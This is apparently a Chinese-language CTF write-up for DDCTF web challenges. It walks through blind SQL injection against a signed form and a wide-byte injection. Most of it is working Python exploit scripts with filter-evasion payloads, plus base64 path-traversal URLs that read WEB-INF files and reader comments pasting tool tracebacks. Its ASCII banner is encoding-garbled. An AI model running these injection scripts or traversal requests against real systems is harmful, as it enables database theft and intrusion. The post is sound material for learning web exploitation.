ctf是不可能的,这辈子都不可能的,只能写写签到这个样子
数据库的秘密
查看源代码js
function signGenerate(obj, key) {
var str0 = '';
for (i in obj) {
if (i != 'sign') {
str1 = '';
str1 = i + '=' + obj[i];
str0 += str1
}
}
return hex_math_enc(str0 + key)
};
var obj = {
id: '',
title: '',
author: '',
date: '',
time: parseInt(new Date().getTime() / 1000)
};
function submitt() {
obj['id'] = document.getElementById('id').value;
obj['title'] = document.getElementById('title').value;
obj['author'] = document.getElementById('author').value;
obj['date'] = document.getElementById('date').value;
var sign = signGenerate(obj, key);
document.getElementById('queryForm').action = "index.php?sig=" + sign + "&time=" + obj.time;
document.getElementById('queryForm').submit()
}
key = 'adrefkfweodfsdpiru'
发现有js加密,还有一个hidden参数,其他两个字符类型的参数都有防火墙,所以我们要从author参数注入,进行盲注
过滤了database()
手残党,js加密翻译到python翻不来,直接调用js的函数好了,具体操作查看execjs库的使用方法
# -*-coding:utf-8-*-
__author__ = 'Deen'
import requests
import execjs
import time
import urllib
def get_js():
f = open("./math.js", 'r')
line = f.readline()
htmlstr = ''
while line:
htmlstr = htmlstr + line
line = f.readline()
return htmlstr
def js_encode(payload, time_str):
jsstr = get_js()
ctx = execjs.compile(jsstr)
key = 'adrefkfweodfsdpiru'
return(ctx.call('hex_math_enc','id=title=author='+payload+'date=time='+time_str+key))
def access(payload):
url = "http://116.85.43.88:8080/EHZTYREPPGMCQLNB/dfe3ia/index.php?"
urllib.unquote(payload)
data = {
"id": "",
"title": "",
"date": "",
"author":"admin'&&"+(payload)+"#",
"button":"search",
}
time_str = str(int(time.time()))
sign = js_encode(data['author'], time_str)
proxies = {'http': "http://127.0.0.1:8080"}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0",
"Content-Type": "application/x-www-form-urlencoded",
"X-Forwarded-For": "123.232.23.245"
}
final_url = url + 'sig=' + sign + '&time=' + time_str
response = requests.post(final_url, data=data, headers=headers, proxies=proxies)
text = response.text
if 'admin' in text :
return 1
else:
return 0
def get_payload(i,w):
#payload = "ord(substr(((Select group_concat(table_name)fRom infOrmation_schema.tables wHere table_schema=database()))fRom " + str(i) + " fOr 1))=" + str(ord(w))+')'
#payload = "((ord(substr((SELECT group_concat(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'
#payload = "((ord(substr((select group_concat(table_name) from information_schema.tables where table_schema='ddctf')fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'
#payload = "((ord(substr((select group_concat(column_name) from information_schema.columns where table_name=0x6374665f6b657937)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'
payload = "((ord(substr((select group_concat(secvalue) from ctf_key7)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'
return payload
if __name__ == '__main__':
dic = list("0qwertyuiopasdf{}ghjklzxcvbnm,1234567890_ABCDEFGHIJKLMNOPQRSTUVWXYZ=#$%^&*()-+!`")
pw = ''
for i in range(1, 40):
for w in dic:
if access(urllib.unquote(get_payload(i, w))):
num = ord(w)
w = chr(num)
pw += w
print pw
break
数据库名:ddctf
表名:ctf_key7,message
列名:secvalue
flag:DDCTF{JQDCSEMLJCCPJRMO}
专属链接
下载WEB-INF/web.xml
http://116.85.48.102:5050//image/banner/Li4vLi4vV0VCLUlORi93ZWIueG1s
mvc-dispatcher-servlet.xml
http://116.85.48.102:5050//image/banner/Li4vLi4vV0VCLUlORi9tdmMtZGlzcGF0Y2hlci1zZXJ2bGV0LnhtbA==
<property name="resourceLoaderPath" value="/WEB-INF/pages/"/>
靠太菜了...日不动
注入的奥妙
在页面源码发现是个big5编码提示宽字节注入,宽字节的要点就是把单引号前面的转义斜杠吞掉或者添加一个转义斜杠转义掉。
所以直接日吧,fuzz
http://116.85.48.105:5033/1f27eda8-1f66-46cd-bac5-3ada3eb7cb73/well/getmessage/%E9%Bb%a0'||%23
%E9%B1%8b'||1%23
%E9%B1%ad'||1%23
image
image
image
开始盲注,脚本如下
过滤了dataabse(),还有大于小于号
# -*-coding:utf-8-*-
__author__ = 'Deen'
import requests
import time
import urllib
def access(payload):
url = "http://116.85.48.105:5033/1f27eda8-1f66-46cd-bac5-3ada3eb7cb73/well/getmessage/%E9%B1%ad'||("
proxies = {'http': "http://127.0.0.1:8080"}
headers = {
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0",
"Content-Type": "application/x-www-form-urlencoded",
}
full_url = url +payload+ ")%23"
response = requests.get(full_url,headers=headers,proxies=proxies)
text = response.text
if "test" in text :
return 1
else:
return 0
def get_payload(i,w):
#payload = "ord(substr(((Select group_concat(table_name)fRom infOrmation_schema.tables wHere table_schema=database()))fRom " + str(i) + " fOr 1))=" + str(ord(w))+')'
#payload = "((ord(substr((SELECT group_concat(schema_name) FROM INFORMATION_SCHEMA.SCHEMATA)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'# slqi
#payload = "((ord(substr((select group_concat(table_name) from information_schema.tables where table_schema=0x73716c69)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))' # message,route_rules,6d657373616765 726f7574655f72756c6573
#payload = "((ord(substr((select group_concat(column_name) from information_schema.columns where table_name=0x6d657373616765)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))' #id,pattern,action,rulepass
payload = "((ord(substr((select group_concat(action) from route_rules)fRom(" + str(i) + ")fOr(1)))=" + str(ord(w))+'))'
return payload
if __name__ == '__main__':
dic = list("0qwertyuiopasdfghjklzxcvbnm,1234567890_ABCDEFGHIJKLMNOPQRSTUV{}WXYZ=#$%^&*()-+!`")
pw = ''
for i in range(30, 100):
for w in dic:
if access(urllib.unquote(get_payload(i, w))):
num = ord(w)
w = chr(num)
pw += w
print pw
break
数据库里没找到flag,有个route表,估计又是找路径的什么鬼,无聊太菜了,不想日了
想起来写过某个针对这种盲注的菜鸡脚本,稍微改改就能用了
image.png
github地址,比较粗糙,求大佬轻喷:https://github.com/deenrookie/fff-sqli
网友评论
###########################################################################
# #
# 鈻堚枅鈻堚枅鈻堚枅鈻堚晽鈻堚枅鈻堚枅鈻堚枅鈻堚晽鈻堚枅鈻堚枅鈻堚枅鈻堚晽 鈻堚枅鈻堚枅鈻堚枅鈻堚晽 鈻堚枅鈻堚
枅鈻堚枅鈺?鈻堚枅鈺? 鈻堚枅鈺? #
# 鈻堚枅鈺斺晲鈺愨晲鈺愨暆鈻堚枅鈺斺晲鈺愨晲鈺愨暆鈻堚枅鈺斺晲鈺愨晲鈺愨暆 鈻堚枅鈺斺晲鈺愨晲鈺愨暆鈻堚枅鈺斺
晲鈺愨晲鈻堚枅鈺椻枅鈻堚晳 鈻堚枅鈺? #
# 鈻堚枅鈻堚枅鈻堚晽 鈻堚枅鈻堚枅鈻堚晽 鈻堚枅鈻堚枅鈻堚晽鈻堚枅鈻堚枅鈻堚晽鈻堚枅鈻堚枅鈻堚枅鈻堚晽鈻堚枅鈺?
鈻堚枅鈺戔枅鈻堚晳 鈻堚枅鈺? #
# 鈻堚枅鈺斺晲鈺愨暆 鈻堚枅鈺斺晲鈺愨暆 鈻堚枅鈺斺晲鈺愨暆鈺氣晲鈺愨晲鈺愨暆鈺氣晲鈺愨晲鈺愨枅鈻堚晳鈻堚枅鈺戔
杽鈻?鈻堚枅鈺戔枅鈻堚晳 鈻堚枅鈺? #
# 鈻堚枅鈺? 鈻堚枅鈺? 鈻堚枅鈺? 鈻堚枅鈻堚枅鈻堚枅鈻堚晳鈺氣枅鈻堚枅鈻堚枅鈻堚晹鈺濃枅鈻堚枅鈻堚枅鈻
堚枅鈺椻枅鈻堚晳 #
# 鈺氣晲鈺? 鈺氣晲鈺? 鈺氣晲鈺? 鈺氣晲鈺愨晲鈺愨晲鈺愨暆 鈺氣晲鈺愨杸鈻€鈺愨暆 鈺氣晲鈺愨晲鈺愨晲鈺
愨暆鈺氣晲鈺? #
# #
# --=[ Version 1.0 coded by Deen ]=-- #
# #
###########################################################################
[ Info ] The fffsqli has start ...
[ Info ] The datas you query: select group_concat(table_name) from information_schema.tables where table_schema=database() [ Info ] The payload: ((ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database())from({}))))<{})
Traceback (most recent call last):
File "fffsqli.py", line 557, in
tamper, proxies, sub, headers, data)
File "fffsqli.py", line 501, in exploit
html = GET_attack(full_url, cookies, proxies, headers)
File "fffsqli.py", line 249, in GET_attack
proxies = {"http": proxy, "https": proxy.replace('http', 'https'), }
AttributeError: 'NoneType' object has no attribute 'replace'
fffsqli现在不能用了吗?
File "fffsqli.py", line 560, in <module>
tamper, proxies, sub, headers, data)
File "fffsqli.py", line 504, in exploit
html = GET_attack(full_url, cookies, proxies, headers)
File "fffsqli.py", line 269, in GET_attack
print color_print('r', " [ Error ] ") + color_print('b', "proxies: ") + color_print('lgray', proxy)
File "fffsqli.py", line 24, in color_print
text = gray + text + color_end
TypeError: cannot concatenate 'str' and 'NoneType' objects
还是不行呢